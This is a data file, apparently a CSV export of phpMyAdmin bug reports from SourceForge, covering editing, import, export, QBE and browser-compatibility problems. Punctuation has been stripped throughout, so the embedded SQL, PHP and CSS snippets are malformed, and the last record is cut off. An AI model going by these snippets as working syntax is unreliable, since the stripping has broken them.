tested in 3.3.5.1deb1 debian package) and 3.3.1 normal ftp install) Testtable and data CREATE TABLE `test` `id` INT 10) UNSIGNED NOT NULL AUTO INCREMENT, `col2` TIMESTAMP NULL DEFAULT NULL, `col3` VARCHAR 50) NULL DEFAULT NULL, PRIMARY KEY `id`) ) COLLATE= latin1 german2 ci ENGINE=MyISAM ROW FORMAT=DEFAULT INSERT INTO `test` `id`, `col2`, `col3`) VALUES 1, 2010 09 02 13 49 53 , 1 ); Original URL https sourceforge.net p phpmyadmin bugs 3100 Original author geki007 Found in version 3.3.5","bug"
"24444","9486","Editing does not work unselecting NOW).
When trying to edit row standard edit, not inline) with date field and unselect NOW function, I get Error in Processing Request undefined SQL to create test table CREATE TABLE `test` `id` INT 10) UNSIGNED NOT NULL AUTO INCREMENT, `col2` TIMESTAMP NULL DEFAULT NULL, `col3` VARCHAR 50) NULL DEFAULT NULL, PRIMARY KEY `id`) ) COLLATE= latin1 german2 ci ENGINE=MyISAM ROW FORMAT=DEFAULT; INSERT INTO `test` `id`, `col2`, `col3`) VALUES 1, 2010 09 02 13 49 53 , 1 ); Javascript console shows Error dt is undefined Source tbl change.js?ts=1283335235 xc5x98xc3xa1dek 227 Original URL https sourceforge.net p phpmyadmin bugs 3101 Original author nijel Found in version Latest Git","bug"
"24444","9487","Relation view on a table omits showing existing foreign keys.
Create a new database, here called geoinfo .
Take the attached DDL script.
It will create 6 tables without data.
should be type InnoDB) Now click on the DB, click the cities table.
The Structure tab should show two indexes correctly PRIMARY on all columns, cities states fk on country code and state code FK to states ).
Now click Relation view somewhere in the middle.
This doesn t show any foreign keys at all!
To confirm, click the SQL tab and issue an SHOW CREATE TABLE cities .
This will show one row with the Create Table cell showing the correct SQL CREATE TABLE `cities` `country code` char 2) NOT NULL, `state code` varchar 5) NOT NULL, `name` varchar 100) NOT NULL, PRIMARY KEY `country code`,`state code`,`name`), KEY `cities states fk` `country code`,`state code`), CONSTRAINT `cities states fk` FOREIGN KEY `country code`, `state code`) REFERENCES `states` `country code`, `code`) ON DELETE NO ACTION ON UPDATE CASCADE ) ENGINE=InnoDB DEFAULT CHARSET=utf8 As you can see, the foreign key exists, but phpMyAdmin doesn t show it in the relation view.
THIS CAN BE EXTREMELY CONFUSING!
I thought something with my DDL or the server was wrong.
Please fix this ASAP.
This is for v3.3.6, but v3.2.3 also exposed this behavior.
Original URL https sourceforge.net p phpmyadmin bugs 3102 Original author kwutzke2 Found in version 4.0.4","bug"
"24444","9488","wrong data type detected in import.
Hi Guys, The problem here is that the import functionality is detecting the wrong data type for a column.
I have a column in an open document spreadsheet which has text in it.
But the import tool detects it as int 3).
If you need a file to play with then you can use the one I have uploaded in the other bug relating to the problem with csv import functionality.
This files structure is basically the same, just type some text in the publication column of the file and upon import you should see the problem I am referring to.
Thanks, Barry.
Original URL https sourceforge.net p phpmyadmin bugs 3230 Original author anonymous Found in version 3.3.9","bug"
"24444","9489","Icons in navi frame do not fit in one row.
With pmahomme theme, the icons in navi frame do not fit into one row.
This is only case when logout is visible using cookie or http auth).
Original URL https sourceforge.net p phpmyadmin bugs 3231 Original author nijel Found in version Latest Git","bug"
"24444","9490","[ok 3.3.8] Big number import creates wrong column type.
When importing a csv with big numbers e.g.
EAN13) it creates a int 13) column instead of a BIGINT 13).
Example 8712121001423 8712121001430 8712121001447 8712121001461 Mysql 5.1.43 1 PHP 5.2.6 1 lenny9 suhosin Phpmyadmin 3.3.6 Original URL https sourceforge.net p phpmyadmin bugs 3103 Original author gieltje Found in version 3.3.6","bug"
"24444","9491","Supporting running from CIFS Samba shares.
See https sourceforge.net projects phpmyadmin forums forum 72909 topic 3832980 for the issue and suggestion.
Original URL https sourceforge.net p phpmyadmin bugs 3104 Original author lem9","bug"
"24444","9492","Pasword generation not available with AJAX.
When adding new user over AJAX with popup dialog), the button for generating password is not shown, while it is when using separate page.
Original URL https sourceforge.net p phpmyadmin bugs 3105 Original author nijel Found in version Latest Git","bug"
"24444","9493","Adding more fields when adding table field broken with AJAX.
Adding more fields on tbl addfield.php just shows processing message and does not actually do anything.
No javascript errors shown.
Original URL https sourceforge.net p phpmyadmin bugs 3106 Original author nijel Found in version Latest Git","bug"
"24444","9494","Routines invisible when no tables.
CREATE DATABASE test; USE test; CREATE FUNCTION fish ) RETURNS TEXT RETURN are best ; The functions and stored procedures are not displayed.
In order to see them, it is necessary to create at least one table view.
Original URL https sourceforge.net p phpmyadmin bugs 3107 Original author fisharebest Found in version 3.3.7","bug"
"24444","9495","Functions Procedures should come first in export.
CREATE DATABASE test; USE test; CREATE FUNCTION fish ) RETURNS TEXT RETURN are best ; CREATE VIEW fishy AS SELECT fish ); Use the database export function, and tick the box to include functions.
The export order is 1) tables view, 2) functions procedures.
You can create a function that refers to non existent tables views functions.
You CANNOT create a view that refers to non existent functions.
Hence this export file cannot be reimported without manually editing it first Suggestion export the routines first.
Original URL https sourceforge.net p phpmyadmin bugs 3108 Original author fisharebest Found in version 3.3.7","bug"
"24444","9496","tabindex wrong for generated insert rows.
The tabindex for fields in the last series of rows is duplicated in the generated insert rows.
Original URL https sourceforge.net p phpmyadmin bugs 3109 Original author lem9 Found in version Latest Git","bug"
"24444","9497","PHP error on manipulation with privileges.
Unfortunately I was not able to dig what is causing this, this is just taken from demo server logs.
On POSTrequest on server privileges.php, I got following error PHP Fatal error Call to a member function isSuccess ) on a non object in server privileges.php on line 1439 012 Original URL https sourceforge.net p phpmyadmin bugs 3111 Original author nijel Found in version Latest Git","bug"
"24444","9498","Table headings on server status unreadable.
Table headings on server status unreadable in pmahomme theme.
http demo.phpmyadmin.net master config server status.php created tmp Original URL https sourceforge.net p phpmyadmin bugs 3238 Original author nijel Found in version Latest Git","bug"
"24444","9499","Error for wrong SQL disappears.
When typing invalid SQL and submitting it by AJAX, the error shortly disappears giving no indication whether query succeeded or failed.
Original URL https sourceforge.net p phpmyadmin bugs 3112 Original author nijel Found in version Latest Git","bug"
"24444","9500","Creating new database on Databases tab messes layout.
When creating new database on Databases tab, the replication column is not added, so the newly created row for new database misses one column.
When the stats are enabled, all columns are missing, so it leads to even worse looking result.
Original URL https sourceforge.net p phpmyadmin bugs 3113 Original author nijel Found in version Latest Git","bug"
"24444","9501","Creating table does not give any feedback.
Create empty database gt; create new table gt; submit AJAX popup and nothing happens.
I would expect both frames to reload to show new table.
Original URL https sourceforge.net p phpmyadmin bugs 3114 Original author nijel Found in version Latest Git","bug"
"24444","9502","Adding field to create table does not work.
Select New table from navigation frame and try to add new field.
Loading... flashes, but nothing changes.
Original URL https sourceforge.net p phpmyadmin bugs 3116 Original author nijel Found in version Latest Git","bug"
"24444","9503","QBE generates wrong query.
When there are three tables in QBE, two of them have relations and one does not, QBE generates following query SELECT `extra` .
, `master` .
, `slave` .
FROM `slave` , `extra` LEFT JOIN `qbetest`.`master` ON `slave`.`master id` = `master`.`id`; While it should generate SELECT `extra`.
, `master`.
, `slave`.
FROM `extra`, `slave` LEFT JOIN `qbetest`.`master` ON `slave`.`master id` = `master`.`id` ; Tables to reproduce CREATE TABLE IF NOT EXISTS `extra` `id` int 11) NOT NULL, `data` text NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; CREATE TABLE IF NOT EXISTS `master` `id` int 11) NOT NULL, `data` text NOT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; CREATE TABLE IF NOT EXISTS `slave` `id` int 11) NOT NULL, `master id` int 11) NOT NULL, `data` text NOT NULL, PRIMARY KEY `id`), KEY `master id` `master id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; ALTER TABLE `slave` ADD CONSTRAINT `slave ibfk 1` FOREIGN KEY `master id`) REFERENCES `master` `id`); To reproduce just do a QBE and select extra.
, master.
, slave.
and check display for all of these.
Original URL https sourceforge.net p phpmyadmin bugs 3117 Original author nijel Found in version 4.2.7","bug"
"24444","9504","QBE ignores internal relations on InnoDB tables.
Once table type is InnoDB, the QBE completely ignores internal relations.
Maybe it is intentional, but I was surprised by such behavior.
Original URL https sourceforge.net p phpmyadmin bugs 3118 Original author nijel Found in version Latest Git","bug"
"24444","9505","events are not exported when using xml.
When exporting as xml, events are not exported.
Original URL https sourceforge.net p phpmyadmin bugs 3120 Original author ruleant Found in version 3.3.7","bug"
"24444","9506","Exporting selected rows produces broken page.
When exporting selected rows, the export page is broken it shows all fields and javascript does not seen to work.
Original URL https sourceforge.net p phpmyadmin bugs 3247 Original author nijel Found in version Latest Git","bug"
"24444","9507","Query Statistics add to well over 250 .
Hi; This has been a minor irritation in terms of trying to figure out some query statistics; at this point I have my own query logging, but it d be nice to see why these are behaving oddly anyway, and perhaps even get it fixed.
The problem is that the admin commands seem to be partially counted in the total queries, but not totally, so that the admin commands end up being something like 170 of the queries run according to the stats, and the rest account for only around 86 88 or so.
I imagine the formatting here won t come out very well, but these are my query statistics Total xc3xb8 per hour xc3xb8 per minute xc3xb8 per second 109 M 1.17 M 19.46 k 324.36 Query type total) xc3xb8 per hour admin commands 176 M 1.889 M 172.00 insert 64 M 690.538 k 62.88 update 13 M 135.105 k 12.30 select 6,769 k 72.723 k 6.62 change db 6,464 k 69.445 k 6.32 delete 312 k 3.356 k 0.31 set option 74 k 791.263 0.07 begin 52 k 561.135 0.05 .. As you can see, the Admin Commands are 172 alone, and the rest add to somewhere around 86 or 88 ; the other commands drop to 0.00 rapidly and don t add up to the 100 .
If the non admin commands added to 100 at least there would be something that made sense there, but they don t come anywhere close to 100 .
I use a number of temporary tables, every 5 minutes or so, and also use GET LOCK ) on a large subset of pages, so perhaps one of these is being counted by one but not by another; anyway it seems odd and I thought I d bring it up.
MySQL version 5.0.51a 3ubuntu5.8 log phpMyAdmin Version information 3.3.2 browser Firefox 3.6.15 Original URL https sourceforge.net p phpmyadmin bugs 3249 Original author jhaagsma","bug"
"24444","9508","copying database doesn t work.
When copying a database in master 3.4 dev), I get the following error both with JS enabled and disabled) There seems to be an error in your SQL query.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem ERROR Unknown Punctuation String 184 STR lt; SQL lt;span class= inner sql gt; CREATE TABLE `test4`.`Commentaar` `ID` int 3 ) default NULL , `Commentaar` varchar 53 ) default NULL ) ENGINE = MyISAM DEFAULT CHARSET = utf8 lt; span gt; SQL query lt;span class= inner sql gt; CREATE TABLE `test4`.`Commentaar` `ID` int 3 ) default NULL , `Commentaar` varchar 53 ) default NULL ) ENGINE = MyISAM DEFAULT CHARSET = utf8 lt; span gt; MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near amp;lt;span class= amp;quot;inner sql amp;quot; amp;gt; CREATE TABLE `test4`.`Commentaar` `ID` int 3 ) at line 1 Original URL https sourceforge.net p phpmyadmin bugs 3123 Original author ruleant Found in version Latest Git","bug"
"24444","9509","events are not copied with db.
When copying renaming a db, events are not copied.
Original URL https sourceforge.net p phpmyadmin bugs 3124 Original author ruleant Found in version 3.3.7","bug"
"24444","9510","left frame is not updated after copy create db.
In master 3.4 dev), when copying creating a DB, the db list in the left frame is not updated anymore in QA 3 3, 3.3.8 dev) this still works.
When removing DROP) a DB, the list is updated.
Original URL https sourceforge.net p phpmyadmin bugs 3125 Original author ruleant Found in version Latest Git","bug"
"24444","9511","Edit after joined select fails.
After select of this kind SELECT a.
FROM Article AS a, Tag AS t, Tag2Object AS t2o WHERE t.name = Foo AND t.id = t2o.tagId AND t2o.parentObjId = a.id links to edit each row are given.
Clicks on them fail with the message SELECT FROM `ArticleJW` WHERE `a`.`id` =1877; 1054 Unknown column a.id in where clause The solution seems to be just cut the alias a off which is only defined in the first SQL statement.
Many thanks in advance, Original URL https sourceforge.net p phpmyadmin bugs 3126 Original author axelge Found in version 3.5.5","bug"
"24444","9512","most overlay ajax stuff doesn t work in chrome chromium.
When trying phpmyadmin HEAD, most overlays and ajax stuff doesn t work Example Privileges gt;User Overview Edit Privileges of an existing user works, but adding a new one throws an error in javascript console Uncaught TypeError Cannot read property PMA messages of undefined js server privileges.js 211 Then I see errors like Uncaught TypeError Cannot read property document of undefined js common.js 440 When I try to edit a row in a table not direct edit) and want to submit When I did t change something I see in the notification area Error in Processing Request undefined however I except to get back to the table).
When I changed something I see 1 row affected , but also don t get back to tables, I see the UPDATE.... query and the edit form, but with old values before the change...
I m sure there are more bugs when using chrome chromium... Is this behaviour a known problem?
Tested with various new Chromiums, will provide more info if needed.
Original URL https sourceforge.net p phpmyadmin bugs 3127 Original author flokli","bug"
"24444","9513","Syntax Errors in PHPExcel Memcache.php.
When upgrading our phpMyAdmin install we detected two syntax errors thanks to our SVN server checking syntax on php files when committing).
During commit of the latest phpMysqlAdmin we detected that a source file has two errors in the file phpMyAdmin 3.3.7 all languages libraries PHPExcel PHPExcel CachedObjectStorage Memcache.php Line 186 is missing a ) Line 200 is missing a .
Patch attached.
Original URL https sourceforge.net p phpmyadmin bugs 3128 Original author jameno123 Found in version 3.3.7","bug"
"24444","9514","Usbility bug in 3.3.1.
If you DROP a table using the menu, and accidentally you reclick on same menu you can DROP DB !!!
Yes, PHP MyAdmin alert you, bud it could be safer if after a drop the breadcumb will jump back to db structure because showing the droppe table name could tell me to reclick on Drop menu... ) Or... simply leavfe breadcumb in this state, but DISABLE drop Original URL https sourceforge.net p phpmyadmin bugs 3129 Original author realtebo","bug"
"24444","9515","extras empty space in UI when database begins with .
extras empty space in UI when lt;database name gt; begins with character see lt;screenshot file http j.mp dmSYXg , http j.mp 93Q2C3 gt; thanks!
Original URL https sourceforge.net p phpmyadmin bugs 3130 Original author anonymous Found in version 3.3.7","bug"
"24444","9516","Setup no longer displays message to move config.
In the 2.x branch, upon saving the generated config.inc.php file, the setup script would display the notification Configuration saved to file config config.inc.php in phpMyAdmin top level directory, copy it to top level one and delete directory config to use it.
This is no longer the case.
In fact, I didn t get any feedback that the file had been saved.
I think the page reloaded, but it happened so quickly that I m not sure.
This request is for that message to be reinstated so users know that 1) the file was saved and 2) that they need to manually move it.
This was origianlly brought to my attention by IRC user JWise1203.
Original URL https sourceforge.net p phpmyadmin bugs 3260 Original author ibennetch","bug"
"24444","9517","Blank Page after Login on Windows 2008 Server IIS7 or IIS7.5.
2010 09 30 11 33 04 EDT I ve seen this problem posted a lot with the index.php page being blank after you login to phpMyAdmin.
I m getting this error on IE browsers.
The formatting in Firefox is horrible, but at least after you login it works.
None of the solutions have worked for me, except this work around... After logging in and getting to the blank index.php page, remove index.php and type main.php?lang=en utf 8 server=1 .
I ve also added variations of these to my config and nothing works... cfg[ PmaAbsoluteUri ] = ; and cfg[ PmaAbsoluteUri ] = http mydomain.com ; it is its own website, so no trailing folder) cfg[ Lang ] = en utf 8 ; and cfg[ DefaultLang ] = en utf 8 ; I also tried commenting out the 1 in the lmhosts file on the Windows 2008 servers.
I have a web server that phpMyAdmin is on and a dedicated MySQL server, so I made this setting on both servers... no luck.
Someone also posted that if i login using the method above with adding the main.php, you should be able to set your theme and then it works.
That didn t work for me either.
I m using IE7 and IE8 with no luck.
Again, Firefox really messes up the page layout with those frames, so who knows what it is or isnt doing.
We are using version 3.3.7 of phpMyAdmin.
index.php is defined and the page does load, but it is blank.
It displays phpMyAdmin 3.3.7 in the title bar, but the background screen is grey with nothing on it.
On the W2K8 Server I gave IUSR full control of the folder that holds the phpmyadmin software.
Original URL https sourceforge.net p phpmyadmin bugs 3131 Original author jonebersole Found in version 3.3.7","bug"
"24444","9518","Page through rows returned from a view.
When you browse the rows of a table, you are able to page through the results with the arrow buttons.
However when viewing the rows returned from a view, that capability is missing.
You can only look at the first x default is 30 I think?)
number of rows.
Original URL https sourceforge.net p phpmyadmin bugs 3132 Original author opike Found in version 3.4.9","bug"
"24444","9519","more errors on chromium.
I found more errors when using Chrom e|ium) at least) under Linux.
I think most of them are related to the frame problem as seen in bug 3084745.
1) Trying to create a table inside hostname gt;database Fill in a table name, click Go The overlay popup window shows, but there is the error Uncaught TypeError Cannot read property document of undefined js common.js 284 I don t know which effect this error has, but I could cause strange bugs code has something to do with checking which database we are at) This error also occurs on many other pages, but here you can surely reproduce it.
2) Change your password at the welcome screen in the General Settings section doesn t work.
No error show in javascript console, and i can see in the resources monitor that user password.php?token=... ajax request=true gets requested, but the popup doesn t show.
3) Sometimes the Database selector dropdown in the sidebar gets stuck and throws the same error as in 1), but in line 104.
4) There is also something in line 440 same file which caues the same error message to appear when you want to see the contents of a table.
I will of course do further testing if needed.
Original URL https sourceforge.net p phpmyadmin bugs 3134 Original author flokli","bug"
"24444","9520","IE9 theme compatibility.
Borders in IE9 look blurry due to specifying sizes in em and round buttons have backgrounds outside of their black frame see screenshot 1).
AJAX Loading message is misaligned in both themes aligned to left instead of being centered).
Original URL https sourceforge.net p phpmyadmin bugs 3264 Original author crackpl Found in version Latest Git","bug"
"24444","9521","Duble quote.
strForeignKeyRelationAdded = Relazione FOREIGN KEY aggiunta ; CHANGE in strForeignKeyRelationAdded = Relazione FOREIGN KEY aggiunta ; Translate in any language NOT use doubble quote o fix \ this error is present in JAVASCRIPT DESIGNER and not save Original URL https sourceforge.net p phpmyadmin bugs 3135 Original author gufo rosso","bug"
"24444","9522","Browser continues to show error even after the error fixed.
Browser version Mozilla 5.0 Windows; U; Windows NT 6.1; en US; rv 1.9.2.12) Gecko 20101026 Firefox 3.6.12 phpMyAdmin version 3.3.8 all languages I installed phpMyAdmin on my ubuntu server.
First I forgot to install php5 mysql php mysql extension) so I got error cannot load mysql extension .
Then I installed mysql extension but the browser kept showing the same error even after reloading the phpMyAdmin root page.
In my access log, there was something like this 122.xxx.xxx.xxx [08 Nov 2010 12 08 10 0000] GET phpMyAdmin HTTP 1.1 304 1850 Mozilla 5.0 Windows; U; Windows NT 6.1; en US; rv 1.9.2.12) Gecko 20101026 Firefox 3.6.12 122.xxx.xxx.xxx [08 Nov 2010 12 08 10 0000] GET phpMyAdmin error.php?lang=ja dir=ltr type= E3 82 A8 E3 83 A9 E3 83 BC error= 5Ba 40http 3A 2F 2Fphp.net 2Fmysql 40Documentation 5D 5Bem 5Dmysql 5B 2Fem 5D 5B 2Fa 5D E6 8B A1 E5 BC B5 E3 82 92 E3 83 AD E3 83 BC E3 83 89 E3 81 A7 E3 81 8D E3 81 BE E3 81 9B E3 82 93 E3 80 82PHP E3 81 AE E8 A8 AD E5 AE 9A E3 82 92 E7 A2 BA E8 AA 8D E3 81 97 E3 81 A6 E3 81 8F E3 81 A0 E3 81 95 E3 81 84 5Ba 40.
2FDocumentation.html 23faqmysql 40documentation 5D E3 83 89 E3 82 AD E3 83 A5 E3 83 A1 E3 83 B3 E3 83 88 5B 2Fa 5D HTTP 1.1 200 1092 Mozilla 5.0 Windows; U; Windows NT 6.1; en US; rv 1.9.2.12) Gecko 20101026 Firefox 3.6.12 The server returned error code 304 Not Modified and the browser was redirected to the error page, reading a cached redirect from disk.
To display a new page, I had to restart my web browser.
Because it was redirected to different error page, I could not force reload the root page.
A similar issue also happens after setting up phpMyAdmin, without pma linked tables infrastructure.
I got some error about pma tables, created tables and fixed config.inc.php, reloaded the main page but kept getting the same error.
This behavior of handling If Modified Since is not I expected.
I wanted not get redirected after fixing configuration error.
Original URL https sourceforge.net p phpmyadmin bugs 3136 Original author jiliu Found in version 3.3.8","bug"
"24444","9523","URLScan blocking certain actions.
Hi, We are running PHPMyAdmin 3.3.8 on a Windows server running IIS6 and are having problems when performing certain actions due to the page being blocked by URLScan see attached file for our configuration).
The latest problem occurs when performing a search on a table searching for records newer than a certain date with a specific text string on another field), this returns the required result set, however when clicking the Full Texts button we get blocked by URLScan, doing it the other way works fine clicking options, full texts, go).
It doesnxe2x80x99t happen very often, and we can work around it, but it can be a little annoying when it does happen.
This is a sample log item from the URLScan log 2010 11 16 09 48 41 92.27.96.94 280165349 GET sql.php?db=databasename table=tablename sql query=SELECT 2A FROM 60tablename 60 WHERE 60ErrorTime 60 3E 3D 272010 11 14 09 3A47 3A32 27 AND 60SiteReference 60 3D 27www.domainname.com 27 goto=sql.php 3Fdb 3Ddatabasename 26amp 3Btable 3Dtablename 26amp 3Btoken 3De9b0d6579ecfcd15300b018bf56e4cf3 26amp 3Bsql query 3DSELECT 2B 252A 2B 2BFROM 2B 2560tablename 2560 2BWHERE 2B 2560ErrorTime 2560 2B 253E 253D 2B 25272010 11 14 2B09 253A47 253A32 2527 2BAND 2B 2560SiteReference 2560 2B 253D 2B 2527www.domainname.com 2527 display options form=1 display text=F token=e9b0d6579ecfcd15300b018bf56e4cf3 Rejected disallowed query string sequence query string gt; Thanks Jim Original URL https sourceforge.net p phpmyadmin bugs 3137 Original author jim wc Found in version 3.3.8","bug"
"24444","9524","Scratchboard for PDF pages not working.
Moving of object is graphical designer of PDF pages seems to have no effect on it s coordinates in text field and thus is not saved.
Original URL https sourceforge.net p phpmyadmin bugs 3138 Original author nijel","bug"
"24444","9525","Duplicate README file on case insensitive file system.
When git pull got following error just now Updating 0132e33..95ca092 error Untracked working tree file readme would be overwritten by merge.
Aborting Original URL https sourceforge.net p phpmyadmin bugs 3139 Original author rimyxp Found in version Latest Git","bug"
"24444","9526","Truncating multi selected tables with ampersands.
phpMyAdmin 3.4.0 beta4 english 1\.
Have at least one table containing an ampersand ) symbol in it s name 2\.
Select more than one table, including the above amperstanded table 3\.
Choose Empty from the drop down menu at the bottom of the table list 4\.
phpMyAdmin dies with an error, as the amperstand has been convered to an HTML entity I ve fixed it the problem was line 358 of libraries mult submits.inc.php CHANGE case empty tbl a query = TRUNCATE ; a query .= PMA backquote htmlspecialchars selected[ i])); run parts = TRUE; break; TO case empty tbl a query = TRUNCATE ; a query .= PMA backquote selected[ i]); run parts = TRUE; break; Original URL https sourceforge.net p phpmyadmin bugs 3273 Original author ebonhand Found in version 3.4.0","bug"
"24444","9527","BLOB emptied after editing another column.
The generated UPDATE query empties a BLOB that was not touched by the edit process.
This works correctly with inline edit but not with traditional editing.
Original URL https sourceforge.net p phpmyadmin bugs 3274 Original author lem9 Found in version Latest Git","bug"
"24444","9528","Ints shouldn t show .0 suffix.
The status page says I ve got 3.0 threads.
This should be just 3 without suffix.
Original URL https sourceforge.net p phpmyadmin bugs 3141 Original author olafvdspek Found in version 3.4.0","bug"
"24444","9529","Create Table Button hover broken Fix included).
When using the new pmahomme theme and you hover over the create table button in the left nav when viewing a database) the button gets an extra background color that overlaps the rounded corners and looks ugly.
To fix this, I ve added the following lines to the theme left.css.php file... Just after line 232 which reads lt;?php if GLOBALS[ cfg ][ LeftPointerEnable ]) \{ ?
gt; div left tableList gt; ul li hover gt; a, div left tableList gt; ul li hover \{ background e4e4e4; color lt;?php echo GLOBALS[ cfg ][ NaviPointerColor ]; ?
gt;; \} I added the following CSS before the closing curly brace of that if statement block div left tableList gt; ul newtable li hover gt; a, div left tableList gt; ul newtable li hover \{ background color transparent; \} Original URL https sourceforge.net p phpmyadmin bugs 3276 Original author benjamwelker Found in version 3.4.0","bug"
"24444","9530","Status page takes 15 secs to generate.
The status page takes 15 secs to generate, that s way too long.
I also don t need any graphs in there.
Original URL https sourceforge.net p phpmyadmin bugs 3142 Original author olafvdspek Found in version 3.4.0","bug"
"24444","9531","Problems with inline edit link for sql query.
To reproduce Browse into a table, click edit on a row and go to edit window.
Do some changes and submit.
Problems 1\.
As seen in the screenshot, two [inline] edit links are shown.
2\.
As seen in the screenshot, when I click on inline edit of one sql query, both the sql queries go into the inline edit mode.
Original URL https sourceforge.net p phpmyadmin bugs 3277 Original author madhuracj Found in version Latest Git","bug"
"24444","9532","path not found .
locale .
Just installed the alpha, it s showing this error on the main page.
Original URL https sourceforge.net p phpmyadmin bugs 3143 Original author olafvdspek Found in version 3.4.0","bug"
"24444","9533","cannot upload into a BLOB.
The AJAX mechanism does not handle the fields upload XXX.
Original URL https sourceforge.net p phpmyadmin bugs 3144 Original author lem9 Found in version 3.4.0","bug"
"24444","9534","Return to previous page on insert.
While inserting new row, the Return to previous choice does not work when using AJAX, it still stays on the same page.
Original URL https sourceforge.net p phpmyadmin bugs 3145 Original author nijel Found in version 3.4.0","bug"
"24444","9535","not alowed user can access other database.
I set up phpmyadmin config with only db to db2.
Throught http auth type.
However I can log with an user that does not have access to this database.
With no databases displayed.
But more scary, is that this user can send a request to is database throught the sql block by intering use db1; select from users....
I suggest that use command should be forbidden on this application.
and in the same field of idea, you could add iin the config file a list of forbidden commands.
Regards Livingdead Original URL https sourceforge.net p phpmyadmin bugs 3281 Original author livingdeadfr Found in version 3.3.10","bug"
"24444","9536","Editing search results doesn t Go back to previous page .
Doing a search using the Search tab) and then Editing any of the results doesn t Go back to the previous page once Go is clicked.
The AJAX status notification appears and says Update is successful, but I m left on the Edit form.
Original URL https sourceforge.net p phpmyadmin bugs 3146 Original author mno Found in version 3.4.0","bug"
"24444","9537","Synchronize not working with empty tables.
When attempting to synchronize a source database with empty tables and a target database with no tables, The synchronizer correctly identifies that new tables need to be created and attempts to create them, only it does not synchronize them.
My system details are phpMyAdmin3.4 and phpMyAdmin3.3 Tested on both Ubuntu 10.04 Chromium Browser 7.0.517.44 MySQL Ver 14.14 Distrib 5.1.41, for debian linux gnu x86 64) using readline 6.1 Original URL https sourceforge.net p phpmyadmin bugs 3148 Original author soloincc Found in version 3.4.0","bug"
"24444","9538","Inline query causes phpMyAdmin to log out over the network.
First the Inline functionality is an excellent idea.
It works when working on databases hosted locally.
It however causes phpMyAdmin to be logged out if querying a network database.
The normal query works on the network database, but the inline one does not.
My system details are phpMyAdmin3.4 Ubuntu 10.04 Chromium Browser 7.0.517.44 and FF v3.6.3 MySQL Ver 14.14 Distrib 5.1.41, for debian linux gnu x86 64) using readline 6.1 Original URL https sourceforge.net p phpmyadmin bugs 3149 Original author soloincc Found in version 3.4.0","bug"
"24444","9539","var)char displayed as binary.
I ve just started to work with PHPMyAdmin 3 and stumbled over a change in display that is wrong in my eyes.
It is probably related to this patch that asked for display of binary fields in binary by default https sourceforge.net tracker index.php?func=detail aid=2308632 group id=23067 atid=377410 However, it seems this default setting is also applied to var)char fields that have some sort of binary collation.
This produces very inconsistent and in my eyes wrong) results.
Example I have the following three fields LangID type binary 2) ar type varchar 40) collation utf8 bin de type varchar 20) collation utf8 bin The content in these fields is displayed as follows.
table display LangID de ar d8a3d984d985d8a7d986d98a de Deutsch edit record display LangID UNHEX 6465) ar content in Arabic de Deutsch So, LangID is displayed non binary although it is a binary field.
However, when editing it suddenly is displayed in binary.
And I don t understand why this would have to be unhexed when submitting to the db.)
On the other hand, of the varchar fields one is displayed in binary, the other isn t. But when editing both are displayed with the string content.
1\.
Whatever display mode may seem to be correct, a mix is surely not correct.
2\.
I think the varchar binary fields should not be displayed in binary by default.
According to http dev.mysql.com doc refman 5.1 en binary varbinary.html The BINARY and VARBINARY data types are distinct from the CHAR BINARY and VARCHAR BINARY data types.
For the latter types, the BINARY attribute does not cause the column to be treated as a binary string column.
Instead, it causes the binary collation for the column character set to be used, and the column itself contains nonbinary character strings rather than binary byte strings.
As a workaround I have set cfg[ DisplayBinaryAsHex ] to FALSE.
This seems to give the desired results for both display and edit.
But I think this should get corrected as the current behavior is very unexpected for the binary collation fields.
I m neither convinced that the binary display of binary fields by default is a good idea as this is a change to the version 2 default.
Deducing from the patch mentioned above only a single person asked for that since the time this setting got introduced the changelog doesn t mention this variable, so I couldn t check when it got introduced).
Original URL https sourceforge.net p phpmyadmin bugs 3150 Original author kai schaetzl Found in version 3.3.7","bug"
"24444","9540","Inline editing fails when just one row.
When I try to inline edit following table, I get a SQL error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near = 345 WHERE `idbtest`.`id` = 3 at line 1 There seems to be missing column name.
Table to reproduce test.idbtest on demo server) CREATE TABLE IF NOT EXISTS `idbtest` `id` int 11) NOT NULL, `jmeno` text NOT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `idbtest` `id`, `jmeno`) VALUES 3, asfddfas ); Original URL https sourceforge.net p phpmyadmin bugs 3152 Original author nijel Found in version Latest Git","bug"
"24444","9541","pmahomme is missing a proper icon for views.
Table icons are 16x16, while the view icon is 10x10 and looks odd.
See attached screenshot.
Original URL https sourceforge.net p phpmyadmin bugs 3288 Original author crackpl","bug"
"24444","9542","Unclosed bracket Bug.
If we want to execute a query with an unclosed bracket, the whole phpMyAdmin interface moves into a frame... Video http www.youtube.com watch?v=iv OvQOku2Q Original URL https sourceforge.net p phpmyadmin bugs 3153 Original author tom slawik Found in version 3.3.8","bug"
"24444","9543","Row marking, null checkbox of inline edit....
Following bugs related to inline editing data was observed recently.
1) For rows that have the class inline edit , clicking on one doesn t highlight and select the row.
2) Clicking on a checked null checkbox doesn t make it unchecked and clicking on an unchecked one doesn t make it checked.
A recent change must have caused this bug as this bug was not observer earlier.
Original URL https sourceforge.net p phpmyadmin bugs 3290 Original author madhuracj Found in version Latest Git","bug"
"24444","9544","No db table entry for users with table priv only and no host.
When creating or updating a user using phpMyAdmin which has no entry in the host field, as the host table should be used, and further has no db privileges but only table specific privileges, phpMyAdmin is not inserting a row into MySQL s db table with Host being empty and all privileges set to N .
This needs to be done as otherwise MySQL does not realize that this user has any privileges for tables inside that DB and therefore the DB can not be selected.
Original URL https sourceforge.net p phpmyadmin bugs 3154 Original author anonymous Found in version 3.3.7","bug"
"24444","9545","chrome database change in sidebar doesn t trigger refresh.
When I try to switch the database in the sidebar, all I get is a javascript error Uncaught TypeError Cannot read property document of undefined in common.js 104 on gentoo x86 chromium 12.0.742.21 there is also a javascript error Cannot read property document of undefined in common.js 268 when I click the Databases tab.
using pmahomme theme which is now default) Original URL https sourceforge.net p phpmyadmin bugs 3293 Original author flokli","bug"
"24444","9546","data containing single quotes prevents sync.
